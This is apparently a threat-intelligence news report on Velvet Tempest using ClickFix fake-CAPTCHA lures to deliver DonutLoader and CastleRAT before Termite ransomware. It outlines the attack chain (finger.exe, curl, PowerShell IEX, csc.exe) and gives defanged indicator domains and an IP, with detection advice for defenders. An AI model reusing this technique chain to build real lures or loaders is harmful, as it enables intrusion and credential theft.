Velvet Tempest deploys CastleRAT via ClickFix in Termite ransomware staging

Velvet Tempest is using ClickFix social engineering to stage Termite ransomware intrusions. Cyber-deception firm MalBeacon observed the full attack chain over 12 days in an emulated U.S. non-profit environment with 3,000 endpoints and 2,500 users, publishing its findings on February 26, 2026. No encryption occurred during the observed window, but the operator's behavior matched textbook pre-ransomware activity. BleepingComputer confirmed the attribution on March 7.

MalBeacon calls this the first public reporting linking ClickFix malvertising to Velvet Tempest. The group is also tracked by Microsoft as DEV-0504. The intrusion began on February 3, 2026, when a malvertising lure directed the victim to a fake CAPTCHA page at h3securecloud[.]com. The page instructed the victim to paste an obfuscated command into the Windows Run dialog. That single paste spawned nested cmd.exe chains and used finger.exe, a legitimate but rarely used Windows utility (TCP/79), to pull initial loaders.

Seven minutes was all it took. The attacker retrieved second-stage payloads via curl.exe, extracted a disguised archive via tar.exe, and ran PowerShell IEX (Invoke-Expression, a command that downloads and runs code in memory) to fetch DonutLoader from vrstudio[.]life and gamestudio[.]life. On-host .NET compilation via csc.exe from temp directories followed. CastleRAT, a remote access trojan linked to the CastleLoader malware loader, was deployed under C:\ProgramData\AndronFolder\ and used Steam Community profile pages as a dead-drop command-and-control (C2) mechanism.

Hands-on-keyboard activity started the same day. The operator ran Active Directory enumeration through encoded PowerShell, including domain trust discovery, user listing, and drive mapping. Three days later, on February 6, the attacker attempted Chrome credential extraction using a script hosted at 143.198.160[.]37. MalBeacon's sensitive source intelligence links that IP to tool staging for Termite ransomware intrusions. The operator then deleted CastleRAT components in a cleanup step. Long-lived DonutLoader C2 traffic persisted until February 16, spanning 12 days, 20 hours, and 15 minutes in total.

To our knowledge, this is the first public reporting that ties these specific ClickFix-style malvertising chains to Velvet Tempest.

— MalBeacon's operation report, February 26, 2026

Several campaign indicators were fresh. MalBeacon noted they showed little or no prior knowledge in public datasets such as VirusTotal, suggesting purpose-built tooling rather than recycled infrastructure.

Velvet Tempest has operated as a ransomware affiliate for at least five years. Microsoft's Security Blog documented the group deploying at least six ransomware-as-a-service (RaaS) payloads between 2020 and 2022 alone. S-RM tracked the group moving to RansomHub in mid-2024 after BlackCat/ALPHV's operators ran an exit scam on their own affiliates. At RansomHub, Velvet Tempest joined other former BlackCat members including Scattered Spider and the perpetrator of the Change Healthcare breach.

Termite ransomware emerged in mid-2024. It is widely assessed as a modified variant of Babuk, whose source code was leaked in 2021. According to TRM Labs, Termite operates as a closed group rather than an open RaaS model. Its highest-profile attack hit supply chain SaaS provider Blue Yonder on November 21, 2024, exfiltrating 680 GB of data and disrupting operations at Starbucks, Morrisons, and Sainsbury's. The group later breached Australian IVF provider Genea, claiming 940 GB of sensitive patient data.

In the case Kroll observed, the user was infected with the information stealing malware, Red Line Stealer, to collect credentials. Ransomware was deployed inside a VMware ESXi environment.

— Laurie Iacono, Associate Managing Director of Cyber Risk at Kroll

Iacono's description of a separate Termite intrusion shows the group's flexibility. In that case, an infostealer preceded the ransomware payload rather than ClickFix. But the pattern is consistent. Credential theft first, encryption second.

Other ransomware affiliates have adopted ClickFix too. Sekoia reported in April 2025 that the Interlock ransomware gang used the same social engineering method to breach corporate networks. ESET's H1 2025 threat report recorded a 517% surge in ClickFix attacks across all threat categories. The technique appeals to ransomware operators because the victim voluntarily executes the command, bypassing file-based endpoint protections entirely.

Neither Microsoft nor any CERT has commented publicly on this specific campaign as of March 9, 2026. MalBeacon has published a full indicator of compromise list with 18 domains, 10 IP addresses, 34 file hashes, and command-line artifacts at its Deception.Pro blog.

Defenders running Windows Active Directory environments should hunt for cmd.exe or PowerShell launched from Windows Run with chained %COMSPEC% commands. Outbound TCP/79 from finger.exe deserves an alert. PowerShell IEX patterns with -WindowStyle Hidden and -EncodedCommand flags, and .NET compilation via csc.exe from user temp directories, are strong indicators of staged loader delivery.